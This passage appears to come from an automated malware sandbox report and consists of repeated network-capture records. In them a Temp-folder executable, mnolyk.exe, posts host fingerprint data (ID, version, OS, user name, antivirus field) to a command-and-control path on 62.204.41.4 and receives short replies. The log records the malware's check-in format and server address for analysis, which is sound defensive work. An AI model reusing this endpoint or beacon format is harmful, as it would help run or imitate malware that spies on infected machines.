                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      422192.168.2.75015062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:53.545295000 CET882OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:53.607392073 CET882INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      423192.168.2.75015162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:53.780648947 CET883OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:53.843168974 CET883INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      424192.168.2.75015262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:54.029428005 CET884OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:54.098175049 CET884INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      425192.168.2.75015362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:54.264448881 CET885OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:54.327646971 CET885INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      426192.168.2.75015462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:54.498606920 CET886OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:54.561449051 CET886INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      427192.168.2.75015562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:54.734216928 CET887OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:54.797312021 CET887INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      428192.168.2.75015662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:54.967951059 CET888OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:55.031579018 CET888INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      429192.168.2.75015762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:55.206070900 CET889OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:55.272998095 CET889INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      43192.168.2.74976762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:08.035706997 CET475OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:08.102848053 CET475INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:08 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      430192.168.2.75015862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:55.451858997 CET890OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:55.515927076 CET890INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      431192.168.2.75015962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:55.686513901 CET891OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:55.749275923 CET891INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      432192.168.2.75016062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:55.923634052 CET892OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:55.987483978 CET892INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      433192.168.2.75016162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:56.171482086 CET893OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:56.235949993 CET893INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      434192.168.2.75016262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:56.405411005 CET894OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:56.468453884 CET894INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      435192.168.2.75016362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:56.641062975 CET895OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:56.706188917 CET895INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      436192.168.2.75016462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:56.874762058 CET896OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:56.938606977 CET896INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:56 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      437192.168.2.75016562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:57.109837055 CET897OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:57.174860001 CET897INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      438192.168.2.75016662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:57.344196081 CET898OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:57.407002926 CET898INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      439192.168.2.75016762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:57.576210976 CET899OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:57.640512943 CET899INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:57 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      44192.168.2.74976862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:08.295558929 CET476OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
